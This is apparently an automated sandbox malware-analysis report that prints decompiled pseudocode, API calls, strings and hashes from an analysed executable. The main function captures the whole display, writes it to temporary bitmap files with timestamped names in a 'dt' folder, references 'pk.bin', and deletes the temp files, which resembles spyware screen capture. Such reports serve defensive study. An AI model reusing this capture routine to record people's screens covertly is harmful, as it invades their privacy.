Instruction Fuzzy Hash: AE310874A40219FFCB00CB94D898DAEBBB9FF89B05B604499F405EB250CB75AE41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00428A6B, Relevance: 1.5, APIs: 1, Instructions: 18
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00428A6B() {
				struct _OSVERSIONINFOA _v152;
				void* _t10;

				_v152.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v152);
				if((_v152.dwPlatformId & 0x00000002) == 0 || _v152.dwMajorVersion < 4) {
					return 0;
				} else {
					_t10 = 1;
					return _t10;
				}
			}

0x00428a7a
0x00428a85
0x00428a92
0x00428aa5
0x00428a9d
0x00428a9f
0x00428aa1
0x00428aa1

APIs

GetVersionExA.KERNEL32(?), ref: 00428A85

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 3ba418f757237164ae849078ab2927c0baa9d4a13d0ab0a1dcd27d792fb7636c
Instruction ID: 64d5eea40ff73774435eb5aa7bf79993bcd1a84673c198daa455dd47f7bf1245
Opcode Fuzzy Hash: 3ba418f757237164ae849078ab2927c0baa9d4a13d0ab0a1dcd27d792fb7636c
Instruction Fuzzy Hash: 96E0123060122846EB319B30AD0FB4A77F85B4170CF4401E6960EE1182DBB899898945

Uniqueness

Uniqueness Score: -1.00%

Function 004249DD, Relevance: 128.2, APIs: 67, Strings: 6, Instructions: 456
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004249DD() {
				void* __ebx;
				int _t212;
				intOrPtr _t214;
				void* _t215;
				void* _t222;
				CHAR** _t227;
				CHAR* _t230;
				void* _t231;
				struct HDC__* _t232;
				CHAR* _t233;
				char _t234;
				CHAR* _t236;
				CHAR** _t239;
				CHAR* _t240;
				char _t241;
				CHAR* _t242;
				void* _t243;
				struct HDC__* _t245;
				void* _t253;
				void* _t254;
				void* _t256;
				void* _t257;
				void* _t266;
				void* _t269;
				void* _t270;
				void* _t271;
				CHAR** _t277;
				void* _t287;
				void* _t288;
				void* _t289;
				void* _t324;
				void* _t325;
				intOrPtr _t367;
				void* _t368;
				void* _t370;
				signed int _t372;
				struct HDC__* _t376;
				void* _t381;
				void* _t383;
				intOrPtr _t384;
				CHAR* _t386;

				E0043E4E0(0x442919, _t381);
				_t384 = _t383 - 0x12c;
				_t367 =  *((intOrPtr*)(_t381 + 8));
				 *((intOrPtr*)(_t381 - 0x10)) = _t384;
				_t388 =  *((intOrPtr*)(_t367 + 0x14b));
				if( *((intOrPtr*)(_t367 + 0x14b)) != 0) {
					_push(_t367);
					E004247C9(_t388);
				}
				_t376 = CreateDCA("DISPLAY", 0, 0, 0);
				 *(_t381 - 0x14) = _t376;
				 *(_t381 - 0x28) = CreateCompatibleDC(_t376);
				_t368 = CreateCompatibleBitmap(_t376,  *((intOrPtr*)(_t367 + 0x760)) -  *((intOrPtr*)(_t367 + 0x758)),  *((intOrPtr*)(_t367 + 0x764)) -  *((intOrPtr*)(_t367 + 0x75c)));
				if(_t368 != 0) {
					 *(_t381 - 0x18) = SelectObject( *(_t381 - 0x28), _t368);
					GetObjectA(_t368, 0x18, _t381 - 0xa8);
					_t212 = BitBlt( *(_t381 - 0x28), 0, 0,  *(_t381 - 0xa4),  *(_t381 - 0xa0),  *(_t381 - 0x14),  *( *((intOrPtr*)(_t381 + 8)) + 0x758),  *( *((intOrPtr*)(_t381 + 8)) + 0x75c), 0xcc0020);
					__eflags = _t212;
					if(_t212 != 0) {
						_push(_t381 - 0x1c);
						L0043E162();
						_t214 =  *((intOrPtr*)(_t381 + 8));
						__eflags =  *(_t214 + 0x139);
						if( *(_t214 + 0x139) != 0) {
							 *(_t381 - 0x3c) =  *(_t381 - 0xa4);
							 *(_t381 - 0x38) =  *(_t381 - 0xa0);
							_push(_t381 - 0x3c);
							_push(_t381 - 0x1c);
							_push( *(_t381 - 0x28));
							E00424571();
							_t384 = _t384 + 0xc;
						}
						_t215 = L00401E60(_t381 - 0x48);
						 *(_t381 - 4) = 0;
						L00402414(_t215, 0, _t368, 0);
						SelectObject( *(_t381 - 0x28),  *(_t381 - 0x18));
						DeleteObject(_t368);
						DeleteDC( *(_t381 - 0x14));
						DeleteDC( *(_t381 - 0x28));
						_push("temporary.bmp");
						_push(0x4558c8);
						L0043DE20();
						 *(_t381 - 4) = 1;
						_t222 = L00402673(_t381 - 0x18, 0,  *(_t381 - 0x18), _t381 - 0x18);
						 *(_t381 - 4) = 0;
						L0043DD36();
						L004020B9(_t222, 0, 0x190, 0x123);
						_push("th_temp.bmp");
						_push(0x4558c8);
						L0043DE20();
						 *(_t381 - 4) = 2;
						L00402673(_t381 - 0x18, 0,  *(_t381 - 0x18), _t381 - 0x18);
						 *(_t381 - 4) = 0;
						L0043DD36();
						L00401E8D(_t381 - 0x48);
						_push("dt");
						_t227 = _t381 - 0x18;
						_push(0x4558c4);
						_push(_t227);
						L0043DE20();
						CreateDirectoryA( *_t227, 0);
						L0043DD36();
						L0043DDD8();
						 *(_t381 - 4) = 3;
						L0043DDD8();
						 *(_t381 - 4) = 4;
						_t230 = GetTickCount();
						_push(0);
						 *(_t381 - 0x14) = _t230;
						L0043E288();
						_t231 =  *_t230;
						_push(0);
						 *(_t381 - 0x18) = _t231;
						L0043E288();
						_t232 =  *(_t231 + 4);
						_push(0);
						 *(_t381 - 0x28) = _t232;
						L0043E288();
						_t233 =  *(_t232 + 8);
						_push(0);
						 *(_t381 - 0x30) = _t233;
						L0043E288();
						_t234 = _t233[0xc];
						_push(0);
						 *(_t381 - 0x34) = _t234;
						L0043E288();
						_push(0);
						_t236 =  *((intOrPtr*)(_t234 + 0x10)) + 1;
						 *(_t381 - 0x38) = _t236;
						L0043E288();
						_push( *(_t381 - 0x14));
						_push( *(_t381 - 0x18));
						_push( *(_t381 - 0x28));
						_push( *(_t381 - 0x30));
						_push( *(_t381 - 0x34));
						_push( *(_t381 - 0x38));
						_push(_t236[0x14] + 0x76c);
						_t239 = _t381 - 0x20;
						_push("%d-%02d-%02d_%02d-%02d-%02d-%d");
						_push(_t239);
						L0043E174();
						_push(0);
						L0043E288();
						_t240 =  *_t239;
						_push(0);
						 *(_t381 - 0x38) = _t240;
						L0043E288();
						_t241 = _t240[4];
						_push(0);
						 *(_t381 - 0x34) = _t241;
						L0043E288();
						_t242 =  *(_t241 + 8);
						_push(0);
						 *(_t381 - 0x30) = _t242;
						L0043E288();
						_t243 = _t242[0xc];
						_push(0);
						 *(_t381 - 0x18) = _t243;
						L0043E288();
						_push(0);
						_t245 =  *((intOrPtr*)(_t243 + 0x10)) + 1;
						 *(_t381 - 0x28) = _t245;
						L0043E288();
						_push( *(_t381 - 0x14));
						_push( *(_t381 - 0x38));
						_push( *(_t381 - 0x34));
						_push( *(_t381 - 0x30));
						_push( *(_t381 - 0x18));
						_push( *(_t381 - 0x28));
						_push( *((intOrPtr*)(_t245 + 0x14)) + 0x76c);
						_push("th_%d-%02d-%02d_%02d-%02d-%02d-%d");
						_push(_t381 - 0x24);
						L0043E174();
						_t386 = _t384 + 0x44;
						 *(_t381 - 0x38) = _t386;
						_push("temporary.bmp");
						_push(0x4558c8);
						_push(_t386);
						L0043DE20();
						_t324 = _t381 - 0x138;
						L00401000(0, _t324, __eflags);
						_push(_t324);
						 *(_t381 - 4) = 5;
						 *(_t381 - 0x38) = _t386;
						_push("th_temp.bmp");
						_push(0x4558c8);
						_push(_t386);
						L0043DE20();
						_t325 = _t381 - 0xf0;
						L00401000(0, _t325, __eflags);
						_push("dt");
						_t253 = _t381 - 0x34;
						_push(0x4558c4);
						_push(_t253);
						 *(_t381 - 4) = 6;
						L0043DE20();
						_push(0x5c);
						_push(_t253);
						_t254 = _t381 - 0x38;
						 *(_t381 - 4) = 7;
						_push(_t254);
						L0043E14A();
						_push(_t325);
						 *(_t381 - 0x30) = _t386;
						_push(_t381 - 0x20);
						_push(_t254);
						_push(_t386);
						 *(_t381 - 4) = 8;
						L0043E282();
						E00403BE8(_t381 - 0x58);
						 *(_t381 - 4) = 0xb;
						L0043DD36();
						 *(_t381 - 4) = 0xa;
						L0043DD36();
						_push("dt");
						_t256 = _t381 - 0x18;
						_push(0x4558c4);
						_push(_t256);
						L0043DE20();
						_push(0x5c);
						_push(_t256);
						_t257 = _t381 - 0x30;
						 *(_t381 - 4) = 0xc;
						_push(_t257);
						L0043E14A();
						_push(_t381 - 0x34);
						 *(_t381 - 0x14) = _t386;
						_push(_t381 - 0x24);
						_push(_t257);
						_push(_t386);
						 *(_t381 - 4) = 0xd;
						L0043E282();
						E00403BE8(_t381 - 0x68);
						 *(_t381 - 4) = 0x10;
						L0043DD36();
						 *(_t381 - 4) = 0xf;
						L0043DD36();
						E0040343E(_t381 - 0x90, __eflags);
						_t370 = 1;
						 *(_t381 - 4) = 0x11;
						 *((intOrPtr*)(_t381 - 0x84)) = 0;
						 *(_t381 - 0x6c) = 0x4558c4;
						E004034A9(_t381 - 0x90, 0);
						E0040349F(_t381 - 0x90, _t370);
						E00403495(_t381 - 0x90,  *((intOrPtr*)( *((intOrPtr*)(_t381 + 8)) + 0x690)));
						L0043DD4E();
						_push(_t381 - 0x58);
						_push(_t381 - 0x138);
						 *(_t381 - 4) = 0x13;
						_t266 = E004034B3(_t381 - 0x90);
						__eflags = _t266 - 2;
						if(_t266 == 2) {
							L11:
							 *0x4558fc = 0;
							 *(_t381 - 4) = 0x11;
							L0043DD48();
							 *(_t381 - 4) = 0xf;
							E0040348A(_t381 - 0x90);
							 *(_t381 - 4) = 0xa;
							E00403C41(_t381 - 0x68, __eflags);
							 *(_t381 - 4) = 6;
							_t269 = E00403C41(_t381 - 0x58, __eflags);
							 *(_t381 - 4) = 5;
							_t270 = L0040107F(_t269, 0, _t381 - 0xf0);
							 *(_t381 - 4) = 4;
							_t271 = L0040107F(_t270, 0, _t381 - 0x138);
							 *(_t381 - 4) = 3;
							L0043DD36();
							 *(_t381 - 4) = 0;
							L0043DD36();
							_t195 = _t381 - 4;
							 *_t195 =  *(_t381 - 4) | 0xffffffff;
							__eflags =  *_t195;
							L00402B07(_t271, 0);
							goto L14;
						} else {
							_t372 = 0x11;
							 *(_t381 - 4) = 0x4558c4;
							L0043DD48();
							L0043DD4E();
							_push(_t381 - 0x68);
							_push(_t381 - 0xf0);
							 *(_t381 - 4) = 0x16;
							__eflags = E004034B3(_t381 - 0x90) - 2;
							if(__eflags != 0) {
								 *(_t381 - 4) = _t372;
								L0043DD48();
								_push("temporary.bmp");
								_t277 = _t381 - 0x14;
								_push(0x4558c8);
								_push(_t277);
								L0043DE20();
								DeleteFileA( *_t277);
								L0043DD36();
								_push("th_temp.bmp");
								L0043DE20();
								DeleteFileA( *(_t381 - 0x14));
								L0043DD36();
								L0043E162();
								 *( *((intOrPtr*)(_t381 + 8)) + 0x11c) =  *(_t381 - 0x14);
								L0043DE20();
								 *(_t381 - 4) = 0x18;
								E0040BC5C( *((intOrPtr*)(_t381 + 8)), __eflags,  *((intOrPtr*)(_t381 + 8)));
								 *(_t381 - 4) = 0x11;
								L0043DD36();
								 *0x4558fc = 0;
								 *(_t381 - 4) = 0xf;
								E0040348A(_t381 - 0x90);
								 *(_t381 - 4) = 0xa;
								E00403C41(_t381 - 0x68, __eflags);
								 *(_t381 - 4) = 6;
								_t287 = E00403C41(_t381 - 0x58, __eflags);
								 *(_t381 - 4) = 5;
								_t288 = L0040107F(_t287, 0, _t381 - 0xf0, _t381 + 8, 0x4558c8);
								 *(_t381 - 4) = 4;
								_t289 = L0040107F(_t288, 0, _t381 - 0x138, "pk.bin", _t381 - 0x14);
								 *(_t381 - 4) = 3;
								L0043DD36();
								 *(_t381 - 4) = 0;
								L0043DD36();
								 *(_t381 - 4) =  *(_t381 - 4) | 0xffffffff;
								L00402B07(_t289, 0, _t381 - 0x14, 0x4558c8);
								_push(1);
								_pop(0);
							} else {
								goto L11;
							}
						}
					} else {
						_push( *(_t381 - 0x14));
						goto L6;
					}
				} else {
					_push(_t376);
					L6:
					DeleteDC();
					 *0x4558fc = 0;
					L14:
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t381 - 0xc));
				return 0;
			}

0x004249e2
0x004249e7
0x004249f0
0x004249f5
0x004249f8
0x004249fe
0x00424a00
0x00424a01
0x00424a06
0x00424a15
0x00424a18
0x00424a21
0x00424a45
0x00424a49
0x00424a5a
0x00424a67
0x00424a95
0x00424a9b
0x00424a9d
0x00424ab6
0x00424ab7
0x00424abc
0x00424abf
0x00424ac5
0x00424acd
0x00424ad6
0x00424adc
0x00424ae0
0x00424ae1
0x00424ae4
0x00424ae9
0x00424ae9
0x00424aef
0x00424af9
0x00424afc
0x00424b07
0x00424b0a
0x00424b19
0x00424b1e
0x00424b25
0x00424b2d
0x00424b2f
0x00424b39
0x00424b3d
0x00424b45
0x00424b48
0x00424b5a
0x00424b5f
0x00424b67
0x00424b69
0x00424b73
0x00424b77
0x00424b7f
0x00424b82
0x00424b8a
0x00424b94
0x00424b99
0x00424b9c
0x00424b9d
0x00424b9e
0x00424ba7
0x00424bb0
0x00424bb8
0x00424bc0
0x00424bc4
0x00424bc9
0x00424bcd
0x00424bd3
0x00424bd7
0x00424bda
0x00424bdf
0x00424be1
0x00424be5
0x00424be8
0x00424bed
0x00424bf0
0x00424bf4
0x00424bf7
0x00424bfc
0x00424bff
0x00424c03
0x00424c06
0x00424c0b
0x00424c0e
0x00424c12
0x00424c15
0x00424c1d
0x00424c1e
0x00424c22
0x00424c25
0x00424c2a
0x00424c35
0x00424c38
0x00424c3b
0x00424c3e
0x00424c41
0x00424c44
0x00424c45
0x00424c48
0x00424c4d
0x00424c4e
0x00424c59
0x00424c5a
0x00424c5f
0x00424c61
0x00424c65
0x00424c68
0x00424c6d
0x00424c70
0x00424c74
0x00424c77
0x00424c7c
0x00424c7f
0x00424c83
0x00424c86
0x00424c8b
0x00424c8e
0x00424c92
0x00424c95
0x00424c9d
0x00424c9e
0x00424ca2
0x00424ca5
0x00424caa
0x00424cb5
0x00424cb8
0x00424cbb
0x00424cbe
0x00424cc1
0x00424cc4
0x00424cc8
0x00424ccd
0x00424cce
0x00424cd3
0x00424cd8
0x00424cdb
0x00424ce0
0x00424ce1
0x00424ce2
0x00424ce7
0x00424ced
0x00424cf2
0x00424cf3
0x00424cf9
0x00424cfc
0x00424d01
0x00424d02
0x00424d03
0x00424d08
0x00424d0e
0x00424d13
0x00424d18
0x00424d1b
0x00424d1c
0x00424d1d
0x00424d21
0x00424d26
0x00424d28
0x00424d29
0x00424d2c
0x00424d30
0x00424d31
0x00424d36
0x00424d3c
0x00424d3f
0x00424d40
0x00424d41
0x00424d42
0x00424d46
0x00424d4e
0x00424d56
0x00424d5a
0x00424d62
0x00424d66
0x00424d6b
0x00424d70
0x00424d73
0x00424d74
0x00424d75
0x00424d7a
0x00424d7c
0x00424d7d
0x00424d80
0x00424d84
0x00424d85
0x00424d8a
0x00424d90
0x00424d93
0x00424d94
0x00424d95
0x00424d96
0x00424d9a
0x00424da2
0x00424daa
0x00424dae
0x00424db6
0x00424dba
0x00424dc5
0x00424dd2
0x00424dd3
0x00424dd8
0x00424dde
0x00424de1
0x00424ded
0x00424e01
0x00424e09
0x00424e17
0x00424e1e
0x00424e1f
0x00424e23
0x00424e28
0x00424e2c
0x00424e61
0x00424e61
0x00424e67
0x00424e6b
0x00424e76
0x00424e7a
0x00424e82
0x00424e86
0x00424e8e
0x00424e92
0x00424e9d
0x00424ea1
0x00424eac
0x00424eb0
0x00424eb8
0x00424ebc
0x00424ec1
0x004250aa
0x004250af
0x004250af
0x004250af
0x004250b6
0x00000000
0x00424e2e
0x00424e30
0x00424e31
0x00424e34
0x00424e3c
0x00424e4a
0x00424e51
0x00424e52
0x00424e5b
0x00424e5f
0x00424ec9
0x00424ecc
0x00424ed1
0x00424ed6
0x00424ed9
0x00424eda
0x00424edb
0x00424ee8
0x00424eed
0x00424ef2
0x00424efc
0x00424f03
0x00424f08
0x00424f11
0x00424f21
0x00424f2b
0x00424f34
0x00424f38
0x00424f40
0x00424f44
0x00424f4f
0x00424f55
0x00424f59
0x00424f61
0x00424f65
0x00424f6d
0x00424f71
0x00424f7c
0x00424f80
0x00424f8b
0x00424f8f
0x00424f97
0x00424f9b
0x00424fa3
0x00424fa6
0x00424fab
0x00424fb2
0x00424fb7
0x00424fb9
0x00000000
0x00000000
0x00000000
0x00424e5f
0x00424a9f
0x00424a9f
0x00000000
0x00424a9f
0x00424a4b
0x00424a4b
0x00424aa2
0x00424aa2
0x00424aa8
0x004250bb
0x004250bb
0x004250c2
0x004250cb

APIs

__EH_prolog.LIBCMT ref: 004249E2
CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00424A0F
CreateCompatibleDC.GDI32(00000000), ref: 00424A1B
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00424A3F
DeleteDC.GDI32(?), ref: 00424AA2

Part of subcall function 004247C9: __EH_prolog.LIBCMT ref: 004247CE
Part of subcall function 004247C9: #537.MFC42(\*.), ref: 004247E4
Part of subcall function 004247C9: #924.MFC42(?,004558C4,00448FA4,\*.), ref: 004247FF
Part of subcall function 004247C9: #922.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042480E
Part of subcall function 004247C9: #800.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042481A
Part of subcall function 004247C9: #800.MFC42(?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 00424826
Part of subcall function 004247C9: #3811.MFC42(?,?,?,?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 0042484A
Part of subcall function 004247C9: FindFirstFileA.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,004558C4,00448FA4,\*.), ref: 00424860
Part of subcall function 004247C9: sscanf.MSVCRT ref: 0042489C
Part of subcall function 004247C9: sscanf.MSVCRT ref: 004248CA
Part of subcall function 004247C9: #551.MFC42(?,?,?,?,?,00000000,000000FF), ref: 004248EE

SelectObject.GDI32(?,00000000), ref: 00424A58
GetObjectA.GDI32(00000000,00000018,?), ref: 00424A67
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 00424A95
#3811.MFC42(?), ref: 00424AB7
SelectObject.GDI32(?,?), ref: 00424B07
DeleteObject.GDI32(00000000), ref: 00424B0A
DeleteDC.GDI32(?), ref: 00424B19
DeleteDC.GDI32(?), ref: 00424B1E
#924.MFC42(?,004558C8,temporary.bmp), ref: 00424B2F
#800.MFC42 ref: 00424B48
#924.MFC42(?,004558C8,th_temp.bmp), ref: 00424B69
#800.MFC42 ref: 00424B82
#924.MFC42(?,004558C4,00448FA4), ref: 00424B9E
CreateDirectoryA.KERNEL32(?,00000000,?,004558C4,00448FA4), ref: 00424BA7
#800.MFC42 ref: 00424BB0
#540.MFC42 ref: 00424BB8
#540.MFC42 ref: 00424BC4
GetTickCount.KERNEL32 ref: 00424BCD
#3337.MFC42(00000000), ref: 00424BDA
#3337.MFC42(00000000,00000000), ref: 00424BE8
#3337.MFC42(00000000,00000000,00000000), ref: 00424BF7
#3337.MFC42(00000000,00000000,00000000,00000000), ref: 00424C06
#3337.MFC42(00000000,00000000,00000000,00000000,00000000), ref: 00424C15
#3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424C25
#2818.MFC42(?,%d-%02d-%02d_%02d-%02d-%02d-%d,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424C4E
#3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424C5A
#3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424C68
#3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424C77
#3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424C86
#3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424C95
#3337.MFC42(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424CA5
#2818.MFC42(?,th_%d-%02d-%02d_%02d-%02d-%02d-%d,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424CCE
#924.MFC42(?,004558C8,temporary.bmp,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424CE2
#924.MFC42(?,004558C8,th_temp.bmp,?,?,004558C8,temporary.bmp,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00424D03
#924.MFC42(?,004558C4,00448FA4,?,004558C8,th_temp.bmp,?,?,004558C8,temporary.bmp,?,?,00000000,00000000,00000000,00000000), ref: 00424D21
#923.MFC42(?,00000000,0000005C,?,004558C4,00448FA4,?,004558C8,th_temp.bmp,?,?,004558C8,temporary.bmp,?,?,00000000), ref: 00424D31
#922.MFC42(?,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,?,004558C8,th_temp.bmp,?,?,004558C8), ref: 00424D46

Part of subcall function 00403BE8: __EH_prolog.LIBCMT ref: 00403BED
Part of subcall function 00403BE8: #535.MFC42(?), ref: 00403C12
Part of subcall function 00403BE8: #800.MFC42(?), ref: 00403C2B

#800.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,?,004558C8,th_temp.bmp,?,?,004558C8,temporary.bmp), ref: 00424D5A
#800.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,?,004558C8,th_temp.bmp,?,?,004558C8,temporary.bmp), ref: 00424D66
#924.MFC42(?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,?,004558C8,th_temp.bmp), ref: 00424D75
#923.MFC42(?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4), ref: 00424D85
#922.MFC42(?,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C), ref: 00424D9A
#800.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?), ref: 00424DAE
#800.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?), ref: 00424DBA
#268.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?), ref: 00424E09

Part of subcall function 004034B3: __EH_prolog.LIBCMT ref: 004034B8
Part of subcall function 004034B3: #268.MFC42 ref: 004034CE
Part of subcall function 004034B3: #1567.MFC42 ref: 004034FA
Part of subcall function 004034B3: #268.MFC42 ref: 00403502
Part of subcall function 004034B3: #909.MFC42(?), ref: 0040351E

#1567.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?), ref: 00424E34
#268.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?), ref: 00424E3C

Part of subcall function 004034B3: #1567.MFC42 ref: 0040361C
Part of subcall function 004034B3: #5628.MFC42(?), ref: 0040362D
Part of subcall function 004034B3: #268.MFC42(?), ref: 00403635
Part of subcall function 004034B3: #1567.MFC42 ref: 00403657
Part of subcall function 004034B3: #800.MFC42 ref: 0040367C

#1567.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?), ref: 00424E6B
#800.MFC42(?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4), ref: 00424EBC
#1567.MFC42(00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?), ref: 00424ECC
#924.MFC42(?,004558C8,temporary.bmp,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?), ref: 00424EDB
DeleteFileA.KERNEL32(00000000,?,004558C8,temporary.bmp,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?), ref: 00424EE8
#800.MFC42(?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4), ref: 00424EED
#924.MFC42(?,004558C8,th_temp.bmp,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C), ref: 00424EFC
DeleteFileA.KERNEL32(00000000,?,004558C8,th_temp.bmp,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000), ref: 00424F03
#800.MFC42(?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4), ref: 00424F08
#3811.MFC42(?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4), ref: 00424F11
#924.MFC42(?,004558C8,pk.bin,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000), ref: 00424F2B
#800.MFC42(?,004558C8,pk.bin,?,?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000), ref: 00424F44
#800.MFC42(?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4), ref: 00424F9B
#800.MFC42(?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4), ref: 00424FA6
#800.MFC42(?,?,00000000,0000005C,?,004558C4,00448FA4,00000000,?,?,?,00000000,0000005C,?,004558C4,00448FA4), ref: 004250AA

Strings

th_%d-%02d-%02d_%02d-%02d-%02d-%d, xrefs: 00424CC8
temporary.bmp, xrefs: 00424B25, 00424CDB, 00424ED1
th_temp.bmp, xrefs: 00424B5F, 00424CFC, 00424EF2
pk.bin, xrefs: 00424F1B
%d-%02d-%02d_%02d-%02d-%02d-%d, xrefs: 00424C48
DISPLAY, xrefs: 00424A0A

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#3337$#924$#1567Delete$#268$CreateH_prologObject$#3811#922File$#2818#540#923CompatibleSelectsscanf$#535#537#551#5628#909BitmapCountDirectoryFindFirstTick
String ID: %d-%02d-%02d_%02d-%02d-%02d-%d$DISPLAY$pk.bin$temporary.bmp$th_%d-%02d-%02d_%02d-%02d-%02d-%d$th_temp.bmp
API String ID: 3359607566-1333268707
